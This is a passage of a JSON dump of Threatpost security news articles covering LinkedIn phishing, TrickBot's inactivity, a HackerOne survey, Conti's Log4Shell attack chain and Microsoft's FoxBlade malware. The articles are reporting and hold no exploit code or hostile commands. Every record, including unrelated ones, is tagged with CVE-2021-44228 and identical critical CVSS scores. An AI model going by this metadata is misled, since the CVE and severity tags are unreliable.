HTML templates with the LinkedIn logo, colors and icons, the report added. The scammers also name-checked well-known companies throughout the bodies of the phishing emails, including American Express and CVS Carepoint, to make the correspondence seem more legitimate, the analysts said.\n\nEven the email\u2019s footer lifted the company\u2019s headquarters\u2019 address and included \u201cunsubscribe\u201d links to add to the email\u2019s authenticity, the analysts pointed out.\n\n\u201cYou can also see the LinkedIn display name spoofing, which is designed to hide the webmail accounts used to launch the attacks,\u201d the report said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/16154716/linkedin-phsihing-email.png>)\n\nLinkedIn phishing email. Source: Egress.\n\nOnce the victim clicks on the malicious links in the email, they were directed to a site to harvest their LinkedIn logins and passwords.\n\n\u201cWhile the display name is always LinkedIn and the emails all follow a similar pattern, the phishing attacks are sent from different webmail addresses that have zero correlation with each other,\u201d the analysts added. \u201cCurrently, it is unknown whether these attacks are the work of one cybercriminal or a gang operating together.\u201d\n\n021722 09:18 UPDATE: LinkedIn sent the following statement to Threatpost:\n\n\u201cOur internal teams work to take action against those who attempt to harm LinkedIn members through phishing. We encourage members to report suspicious messages and help them learn more about what they can do to protect themselves, including turning on [two-step verification](<https://www.linkedin.com/help/linkedin/answer/544/turn-two-step-verification-on-and-off?lang=en>). To learn more about how members can identify phishing messages, see our Help Center [here](<https://www.linkedin.com/help/linkedin/answer/5342/phishing-emails?lang=en>).\u201d\n\n## **Data Scraping Attacks on Job Seekers **\n\nBesides using potential job leads to trick targets into coughing up their credentials, Imperva, in a separate report, detailed how it stopped the [largest bot attack](<https://www.imperva.com/blog/imperva-mitigates-massive-bot-attack-of-400-million-requests/>) the company has seen to date, on a global job listing site.\n\nImperva didn\u2019t specifically name the company, but the company said that it was bombarded with 400 million bot requests over 400,000 unique IP addresses over four days that tried to scrape all its job seekers\u2019 data.\n\nThe Imperva team added that these types of web-scraping attacks are common and can result in \u201clower conversion rates, skewed marketing analytics, decrease in SEO ranking, website latency, and even downtime (usually caused by aggressive scrapers).\u201d\n\nBut as Imperva pointed out in its report, data scraping is one of those cybersecurity gray areas. Collecting publicly available information isn\u2019t itself a data breach, but collected in mass quantities, it can be a weapon wielded against users in social-engineering attacks.\n\nLast summer, a massive [data-scraping attack against LinkedIn](<https://threatpost.com/linkedin-data-scrape-victims-targeted-attackers/167473/>) was discovered to have collected at least 1.2 billion user records that were later sold on underground forums. At the time, LinkedIn reiterated that the [scraped data was public information](<https://threatpost.com/data-700m-linkedin-users-cyber-underground/167362/>), not private information, and didn\u2019t qualify as a breach.\n\nLinkedIn isn\u2019t really at fault here, according to Yehuda Rosen, senior software engineer at nVisium.\n\n\u201cThis has little to do with LinkedIn specifically \u2013 they\u2019re not doing anything wrong here,\u201d Rosen explained to Threatpost. \u201cIt boils down to the fact that LinkedIn has hundreds of millions of members \u2013 many of whom are very accustomed to seeing frequent legitimate emails from LinkedIn \u2013 and may inevitably click without carefully checking that each and every email is the real deal.\u201d\n\nThat leaves it to individual users to be mindful of the information they expose publicly and how it could be used to trick them into clicking on a malicious link.\n\n\u201cWhile I don\u2019t believe that this will hurt LinkedIn\u2019s brand, this does reiterate the importance of email phishing education,\u201d Ray Kelly, with NTT Application Security, told Threatpost by email. \u201cGiven these emails are coming from a legit LinkedIn email address makes it especially difficult to identify the danger. My rule is to never click on email links. Always visit the site directly.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a _**[**_LIVE roundtable discussion_**](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. _**[**_REGISTER NOW_**](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T21:15:47", "type": "threatpost", "title": "Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T21:15:47", "id": "THREATPOST:CAA9AA939562959323A4675228C233A5", "href": "https://threatpost.com/massive-linkedin-phishing-bot-attacks-hungry-job-seekers/178476/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T00:10:25", "description": "The group behind the TrickBot malware is back after an unusually long lull between campaigns, according to researchers \u2014 but it\u2019s now operating with diminished activity. They concluded that the pause could be due to the TrickBot gang making a large operational shift to focus on partner malware, such as Emotet.\n\nA [report](<https://intel471.com/blog/trickbot-2022-emotet-bazar-loader>) from Intel 471 published on Thursday flagged a \u201cstrange\u201d period of relative inactivity, where \u201cfrom December 28, 2021 until February 17, 2022, Intel 471 researchers have not seen new TrickBot campaigns.\u201d\n\nBefore the lull, an [incident](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) last November indicated that the TrickBot botnet was used to distribute Emotet \u2013 indicating that the collaboration with the group behind the Emotet malware is ongoing. Intel 471 also tied in a third group \u2013 the operators of the Bazar malware family \u2013 whose controllers were found \u201cpushing commands to download and execute TrickBot (mid-2021) and Emotet (November 2021).\u201d\n\nThe report noted how, in years past, malicious actors have used TrickBot to install Emotet on target machines, and vice versa. Researchers speculated that, this time around, \u201cit\u2019s likely that the TrickBot operators have phased TrickBot malware out of their operations in favor of other platforms, such as Emotet.\u201d\n\n## **TrickBot\u2019s \u2018Turbulent\u2019 Recent History**\n\nTrickBot was originally deployed as a banking trojan, in 2016. In the time since, it\u2019s developed into a full-suite malware ecosystem, replete with tools for [spying and stealing data](<https://threatpost.com/trickbot-malware-virtual-desktop-espionage/167789/>), [port scanning](<https://threatpost.com/trickbot-port-scanning-module/163615/>), [anti-debugging](<https://threatpost.com/trickbot-crash-security-researchers-browsers/178046/>) \u2013 crashing researchers\u2019 browsers before they have a chance to identify its presence \u2013 [identifying and wiping firmware](<https://threatpost.com/trickbot-returns-bootkit-functions/161873/>), and much more.\n\nTrickBot has received particular attention from authorities in recent years. In 2020, Microsoft obtained a U.S. court order that allowed it to [seize](<https://threatpost.com/trickbot-takedown-crimeware-apparatus/160018/>) servers from the group behind the malware. Last year, [multiple](<https://threatpost.com/trickbot-coder-decades-prison/166732/>) [members](<https://threatpost.com/authorities-arrest-trickbot-member/169236/>) of that group were arrested and handed charges carrying potentially years-long prison sentences. Despite these efforts, TrickBot remained active.\n\nUntil late last December, that is, when new attacks ground to a halt. According to the report, Trickbot\u2019s most recent campaign \u201ccame on December 28, 2021. That was one of three malware campaigns that were active during the month. As a contrast, eight different [campaigns] were discovered in November 2021.\u201d\n\n\u201cWhile there have been lulls from time-to-time,\u201d the report noted, \u201cthis long of a break can be considered unusual.\u201d\n\nThe decline in activity continues as well: TrickBot\u2019s onboard malware configuration files, which contain a list of controller addresses to which the bot can connect, \u201chave gone untouched for long periods of time,\u201d researchers said.\n\nTellingly, these files \u201cwere once updated frequently, but are receiving fewer and fewer updates,\u201d researchers said. On the other hand, command-and-control (C2) infrastructure associated with TrickBot remains active, with updates adding \u201cadditional plugins, web injects and additional configurations to bots in the botnet.\u201d\n\nThe researchers have now concluded with high confidence that \u201cthis break is partially due to a big shift from TrickBot\u2019s operators, including working with the operators of Emotet.\u201d\n\n## **An Old Alliance**\n\nAs noted, the collaboration with Emotet (and Bazar Loader, for that matter) is not new. But researchers told Threatpost that the nature of the relationship could be evolving.\n\n\u201cIt\u2019s difficult to say what could result from the collaboration,\u201d wrote Hank Schless, senior manager for security solutions at Lookout, via email. \u201cWe do know that Emotet recently began testing how it could install Cobalt Strike beacons on previously infected devices, so maybe they could combine functionality with TrickBot.\u201d Cobalt Strike is a penetration testing tool used by cyber-analysts [and attackers](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) alike.\n\n\u201cIn the security industry, knowledge-sharing is how we discover some of the most nefarious threats,\u201d he noted. \u201cHowever, on the flip side of the coin you have threat actors who are doing the same thing \u2026 they share their malware on Dark Web forums and other platforms in ways that help the entire community advance their tactics.\u201d\n\nSometimes, cybercrime gangs have \u201cpartnerships or business relationships much like those that happen in conventional business,\u201d John Bambenek, principal threat hunter at Netenrich, told Threatpost via email. \u201cIn this case, it looks like the crew behind TrickBot decided it was easier to \u2018buy\u2019 than \u2018build.'\u201d\n\nSome think the malware may be on its way out. After all, TrickBot is now five years old: a lifetime in cybersecurity terms. \u201cPerhaps,\u201d Intel 471 researchers wrote, \u201ca combination of unwanted attention to TrickBot and the availability of newer, improved malware platforms has convinced the operators of TrickBot to abandon it.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our_** [**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T21:32:15", "type": "threatpost", "title": "TrickBot Takes a Break, Leaving Researchers Scratching Their Heads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T21:32:15", "id": "THREATPOST:9922BFA77AFE6A6D35DFEA77A4D195C0", "href": "https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T15:47:11", "description": "Enterprises are putting greater stock in cybersecurity, but outdated \u201csecurity by obscurity\u201d is still prevailing as companies wrestle with security awareness and shy away from bug-bounty programs.\n\nThat\u2019s according to new survey data from HackerOne, which found that a full 65 percent of organizations surveyed claimed that they \u201cwant to be seen as infallible.\u201d However, just as many \u2013 64 percent \u2013 said they practice a culture of security through obscurity, where secrecy is used as the primary method of protecting sensitive systems and assets.\n\n## Struggling with Security Awareness\n\nWhen it comes to what\u2019s actually happening on the ground inside organizations, 57 percent of respondents in the report \u2013 \u201cThe Corporate Security Trap: Shifting Security Culture from Secrecy to Transparency\u201d \u2013 said that they struggle to create a culture of cybersecurity, and only 26 percent are \u201cvery confident\u201d that staff are following security practices.\n\nWorse, only 12 percent of departments outside of security and IT make cyber-awareness and training a core focus, according to the survey.\n\nAnd that\u2019s translating to trouble: About 63 percent said they\u2019ve had a security breach as a result of staff sidestepping security measures.\n\nSome of the issues come from the top: Only 29 percent of boards are \u201cdeeply involved\u201d in cybersecurity strategy; and 65 percent said that the idea that security slows innovation is telegraphed to them.\n\nMeanwhile, 63 percent of organizations said that they believe that cybersecurity is \u201cas important as cost when choosing a supplier,\u201d and 62 percent of organizations \u201cwould take their business elsewhere if a supplier suffered a data breach.\u201d\n\n## The Problem with Secrecy\n\nThus, perhaps it\u2019s no wonder that 38percent of respondents agreed that their organizations \u201caren\u2019t open about their cybersecurity practices.\u201d\n\nBut according to the authors of the report, this kind of approach is harmful, because \u201cby not admitting weaknesses and asking for help fixing them, organizations risk far more significant damage to their brand should a vulnerability be exploited.\u201d\n\n\u201cSunshine is the best medicine,\u201d wrote HackerOne CTO and co-founder Alex Rice, in the report. \u201cShining a light on the work to be done is the only way to win. We must stop asking security teams to toil away in obscurity.\u201d\n\nThe report suggested a few general changes organizations can make, like reporting breaches to stakeholders and publishing reports outlining security measures that companies have in place. Another practical fix to a closed security culture would be putting into place Vulnerability Disclosure Policies (VDPs), bug-bounty programs and regular pentests that get third-party researchers involved.\n\nHowever, third-party vulnerability reporting comes with its own complications.\n\n## The Controversy Around Bug Bounties\n\nMajor corporations like [Google](<https://threatpost.com/google-product-abuse-bug-bounties/158940/>) and [Intel](<https://threatpost.com/intel-expands-bug-bounty-program-post-spectre-and-meltdown/129980/>) pay out thousands of dollars at a time \u2013 even [millions of dollars](<https://threatpost.com/google-record-high-bug-bounty-payouts/152354/>) every year \u2013 in bug-bounty programs. With the financial incentive to do so, outside researchers and friendly hackers help companies find zero-day vulnerabilities early, before the bad guys do.\n\nHowever, this new survey data shows that not everyone is on board, suggesting that not all security professionals are open to outside scrutiny. A full 67 percent of respondents said that they \u201cwould rather accept software vulnerabilities than work with hackers.\u201d\n\nAnd the hesitancy goes both ways. Ethical hackers are often dissuaded from reporting vulnerabilities to vendors, because they\u2019re so often [ignored or outright attacked](<https://threatpost.com/the-vulnerability-disclosure-process-still-broken/137180/>) for doing so. In October, for example, the governor of Missouri launched a [criminal investigation against a journalist](<https://threatpost.com/missouri-prosecute-hacker-data-leak/175501/>) who reported that the state\u2019s website was exposing hundreds of thousands of social security numbers on the web.\n\nIt\u2019s no surprise, then, that 50 percent of hackers \u201chave not disclosed a bug because of a [previous negative experience](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) or lack of channels through which to report,\u201d according to the report.\n\n## What Organizations Can Do\n\nTo establish trust and openness in corporate cybersecurity, HackerOne suggested four core tenets for corporate security responsibility. They are:\n\n * **Encouraging industry-wide transparency to build trust and share intelligence;**\n * **Fostering a culture of industry-wide collaboration that gives everyone the tools to take control of reducing cyber-risk;**\n * **Promoting innovation by inspiring development teams to build with security in mind and bring secure products to market faster;**\n * **And holding oneself and suppliers accountable to following best practices to develop security as an easy point of differentiation.**\n\nThe stakes are high: About 53 percent of survey respondents admitted that \u201cthey have lost customers as a result of a security breach.\u201d Bottom line? The sooner organizations evolve to be more open and collaborative about security, the better off they \u2013 and the rest of us, by extension \u2013 will be.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T15:30:19", "type": "threatpost", "title": "Most Orgs Would Take Security Bugs Over Ethical Hacking Help", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T15:30:19", "id": "THREATPOST:CD9589D22198CE38A27B7D1434FEE963", "href": "https://threatpost.com/orgs-security-bugs-ethical-hacking-help/178862/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T18:13:55", "description": "The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack chain.\n\nThe sophisticated Russia-based Conti group \u2013 which Palo Alto Networks [has called](<https://unit42.paloaltonetworks.com/conti-ransomware-gang/>) \u201cone of the most ruthless\u201d of dozens of ransomware groups currently known to be active \u2013 was in the right place at the right time with the right tools when [Log4Shell hit the scene](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) shared with Threatpost on Thursday.\n\nAs of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel\u2019s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> vCenter ESXi with log4shell scan for vCenter.\n\n## Attack Chain\n\nStepping through that attack chain:\n\n 1. **Emotet** is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install \u2026\n 2. [**Cobalt Strike**](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), the legitimate, commercially available tool used by network penetration testers on infected devices and pervasively adopted by cybercriminals. It gives threat actors direct access to targets and, according to Boguslavskiy, precedes\u2026\n 3. **Human Exploitation**, which describes the stage of an attack in which threat actors personally investigate the network, looking for critical data, analyzing the network structure, defining the most important network shares, and looking at ways to elevate privileges, among other things. That poking around is followed by \u2026\n 4. **Missing ADMIN$ share. **Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As [Microsoft](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/problems-administrative-shares-missing>) puts it, \u201cMissing administrative shares typically indicate that the computer in question has been compromised by malicious software.\u201d Next up comes \u2026\n 5. **Kerberoast. **Kerberoasting, a common, pervasive attack that exploits a combination of weak encryption and poor service account password hygiene, is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. With regards to the final link in the attack chain, the Conti gang last week zeroed in on \u2026\n 6. **VMWare vCenter servers.** As of Wednesday, Dec. 15, Conti was looking for vulnerable VMWare networks for initial access and lateral movement. The VMWare servers are on a dismayingly [long list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of affected components and vendors whose products have been found to be vulnerable to Log4Shell.\n\nWithin two days of the public disclosure of the vulnerability in Apache\u2019s Log4j logging library on Dec. 10 \u2013 a bug that came under attack within hours \u2013 Conti group members were discussing how to exploit it as an initial attack vector, according to AdvIntel.\n\nApache patched the bug on Dec. 11, but its patch, Log4J2, [was found to be incomplete](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) in certain non-default configurations and paved the way for denial-of-service (DoS) attacks in certain scenarios.\n\nAs if two bugs aren\u2019t enough, yet another, similar but distinct bug was [discovered](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>) last week in the Log4J logging library. Apache issued a patch on Friday.\n\n## Conti Winds Up Its Exploit Machine\n\nAccording to the Thursday AdvIntel writeup, from Vitali Kremez and Yelisey Boguslavskiy, multiple Conti group members on Dec. 12 began to chat about exploiting the Log4Shell vulnerability as an initial attack vector. That led to scanning for vulnerable systems that AdvIntel first tracked the next day, on Dec. 13.\n\n\u201cThis is the first time this vulnerability entered the radar of a major ransomware group,\u201d according to the writeup. The emphasis is on \u201cmajor,\u201d given that the first ransomware group to target Log4Shell was a ransomware newcomer named[ Khonsari](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). As Microsoft has [reported](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft>), Khonsari was locking up Minecraft players via unofficial servers. First spotted by [Bitdefender](<https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/>) in Log4Shell attacks, the ransomware\u2019s demand note[ lacked a way to contact](<https://www.bleepingcomputer.com/news/security/microsoft-khonsari-ransomware-hits-self-hosted-minecraft-servers/>) the operators to pay a ransom. That means that Khonsari is more of a wiper, meant to troll Minecraft users by taking down their servers, rather than ransomware.\n\nKhonsari ransomware was just one malware that\u2019s been thrown at vulnerable servers over the course of the Log4j saga. Within hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT). reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\n## A Perfect Storm\n\nLog4Shell has become a focal point for threat actors, including suspected nation state actors who\u2019ve been observed investigating Log4j2, AdvIntel researchers noted. The compressed timeline of the public disclosure followed fast by threat actor interest and exploits exemplifies the accelerated trajectory of threats witnessed since the [ProxLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) family of bugs in Exchange Server in March and the subsequent attacks, they said: \u201cif one day a major CVE is spotted by APTs, the next week it is weaponized by ransomware,\u201d according to their writeup.\n\nBut out of all the threat actors, Conti \u201cplays a special role in today\u2019s threat landscape, primarily due to its scale,\u201d they explained. It\u2019s a highly sophisticated organization, comprising several teams. AdvIntel estimates that, based on scrutiny of Conti\u2019s logs, the Russian-speaking gang made over $150 million over the past six months.\n\nBut still they continue to expand, with Conti continually looking for new attack surfaces and methods.\n\nAdvIntel listed a number of Conti\u2019s innovations since August, including:\n\n * [Secret backdoors](<https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent>): Conti\u2019s Atera Agent allows the gang to gain persistence on infected protected environments: especially those equipped with more aggressive machine learning endpoint detention and response anti-virus productions. \u201cThe IT management solution enables monitoring, management and automation of hundreds of SMB IT networks from a single console,\u201d AdvIntel described in an August report.\n * New[ backup removal](<https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love>) solutions that expanded Conti\u2019s ability to [blow up backups](<https://threatpost.com/conti-ransomware-backups/175114/>).\n * An entire operation to revive[ Emotet](<https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware>), which [resurfaced](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) in November.\n\nThe writeup shared a timeline of Conti\u2019s search for new attack vectors, shown below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/20163220/conti_timeline-e1640035956574.jpg>)\n\nTimeline of Conti\u2019s search for new attack vectors. Source: AdvIntel.\n\n## Keeping Your Head Above the Logjam\u2019s Water\n\nAdvIntel shared these suggested recommendations and mitigations for Log4Shell:\n\n * The Dutch National Cyber Security Center shared a list of the affected software and recommendations linked to each one of them [on GitHub](<https://github.com/NCSC-NL/log4shell/tree/main/software>).\n * Here are [VMWare\u2019s workaround instructions](<https://kb.vmware.com/s/article/87081>) to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081).\n\n## When Will It All End?\n\nLou Steinberg, former chief technology officer at TD Ameritrade, said it ain\u2019t over til it\u2019s over, \u201cAnd it\u2019s not over.\u201d\n\n\u201cWe don\u2019t know if we patched systems after they were compromised from Log4J, so it may be a while before we know how bad things are,\u201d he said in an article shared with Threatpost on Monday. \u201cThis will happen again. Modern software and systems are built from components which aren\u2019t always trustworthy. Worse, bad actors know this and look to subvert the components to create a way into otherwise trusted software.\u201d\n\n122121 10:25 Added more attack chain details provided by AdvIntel.\n\n122121 13:00 Removed brute-force from the attack chain, given that, as AdvIntel explained, the brute-forcing of encrypted hashes carried out in these attacks is a different kind of brute-forcing than the typical definition of trying numerous credentials.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T22:11:30", "type": "threatpost", "title": "Conti Ransomware Gang Has Full Log4Shell Attack Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:30", "id": "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "href": "https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T16:59:59", "description": "\u201cAs tanks rolled into Ukraine, so did malware,\u201d [summarized](<https://twitter.com/andreasharsono/status/1498631557392715777>) humanitarian author Andreas Harsono, referring to the [novel malware](<https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/>) that Microsoft has named FoxBlade.\n\nOn Monday, the company reported that its Threat Intelligence Center (MSTIC) had detected cyberattacks launched against Ukraine\u2019s digital infrastructure hours before Russia\u2019s tanks and missiles began to pummel the country on Thursday.\n\n\u201cSeveral hours before the launch of missiles or movement of tanks on February 24, Microsoft\u2019s Threat Intelligence Center (MSTIC) detected a new round of offensive and destructive cyberattacks directed against Ukraine\u2019s digital infrastructure,\u201d Microsoft President and Vice-Chair Brad Smith [said](<https://blogs.microsoft.com/on-the-issues/2022/02/28/ukraine-russia-digital-war-cyberattacks/>).\n\n\u201cWe immediately advised the Ukrainian government about the situation, including our identification of the use of a new malware package (which we denominated FoxBlade), and provided technical advice on steps to prevent the malware\u2019s success.\u201d\n\nSmith said that within three hours of discovering FoxBlade, Microsoft had added new signatures to its Defender anti-malware service to detect the exploit.\n\n## FoxBlade Specifics\n\nMicrosoft has issued a Security Intelligence [advisory](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=DoS:Win32/FoxBlade.A!dha>) about FoxBlade, which is a novel trojan.\n\nWhile the company shared neither technical specifics nor details about how FoxBlade achieves initial access on targeted machines, the advisory did explain that \u201cThis[ trojan](<https://www.microsoft.com/security/portal/mmpc/shared/glossary.aspx#trojan>) can use your PC for[ distributed denial-of-service (DDoS)](<https://www.microsoft.com/security/portal/mmpc/shared/glossary.aspx##ddos>) attacks without your knowledge.\u201d\n\nSuch attacks [topped thousands](<https://threatpost.com/ddos-attacks-records-q3/176082/>) daily in Q3 and were expected to keep growing, Kaspersky researchers reported in November 2021.\n\nBeyond launching DDoS attacks, FoxBlade also downloads and installs other programs \u2013 including other malware \u2013 onto infected systems, Microsoft [advised](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/FoxBlade.B!dha>).\n\n## \u2018Precisely Targeted\u2019\n\nThe cyberattacks \u2013 which were ongoing as of Monday, Smith said \u2013 have been \u201cprecisely targeted,\u201d unlike the indiscriminate malware splattered in the NotPetya attack. The NotPetya cyberattack [targeted hundreds of firms and hospitals worldwide in 2017](<https://threatpost.com/notpetya-linked-to-industroyer-attack-on-ukraine-energy-grid/138287/>), including Ukraine\u2019s power grid.\n\nIn 2020, the U.S. Department of Justice (DOJ) [charged](<https://threatpost.com/doj-charges-6-sandworm-apt-members-in-notpetya-cyberattacks/160304/>) six Russian nationals for their alleged part in the Ukraine and other cyberattacks.\n\nRegardless of the targeted nature of the current cyberattacks on Ukraine, Smith said Microsoft is still \u201cespecially concerned\u201d about recent cyberattacks aimed at Ukrainian civilian digital targets that have been more wide-ranging, including those fired at the financial sector, agriculture sector, emergency response services, 